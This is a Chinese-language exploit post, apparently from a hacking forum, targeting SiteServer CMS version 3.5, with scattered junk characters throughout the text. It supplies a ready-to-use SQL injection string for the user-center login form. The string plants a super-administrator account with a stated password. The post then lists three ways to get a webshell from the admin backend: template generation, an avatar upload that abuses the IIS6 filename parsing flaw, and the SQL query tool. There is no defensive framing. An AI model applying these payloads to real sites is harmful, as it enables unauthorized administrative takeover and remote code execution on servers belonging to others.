经测试秒杀最新的3.5版8 ]5 C& n( n7 b# _; @6 W
stieserver官网:www.siteserver.cn+ e5 D( G- C- j0 V5 s1 Q2 w: e
EXP:3 g$ j& @, K9 I% x0 ^; J+ r
直接访问UserCenter/login.aspx+ F! v# h6 i7 u1 X
用户名处输入:4 p4 U/ A3 `1 T; l
2 n3 c. {4 N$ R1 v2 }1 P123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
8 a/ a S' X$ ~, [密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。! |7 F# ^' h ]) ]
之后再访问后台SiteServer/login.aspx用插入的用户登陆% w3 b# ~4 j3 i$ _
后台拿webshell的三种方法:1 ~" P1 v9 t. ~4 l6 f. j) i
一、. E \4 r% ~9 q4 n9 m
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
# t/ U' {* r3 H/ s3 y% g {* a二、
4 Q1 e& O+ q0 ?( ?; a# v成员权限-》添加用户-》用户名为:1.asp
7 @7 _. P8 F" Bhttp://127.0.0.1/usercenter/
3 q8 E7 L4 C$ u7 n5 U& r用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' F, C* ]& w1 R8 f" q' N2 H5 b, M! U(ps:后台添加用户时不会验证是否含有非法字符)
0 p. E4 e7 I s2 T2 u三、
. A& Y4 W; U' J7 e/ L% L' B系统工具-》实用工具-》机器参数查看! g$ R2 R5 V$ |) ?
可以看到数据库类型、名称,WEB路径' e7 b1 u) g2 j- @) e# R; r$ C
系统工具-》数据库工具-》SQL语句查询
& C3 l3 b: }/ I$ q. n3 ^这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |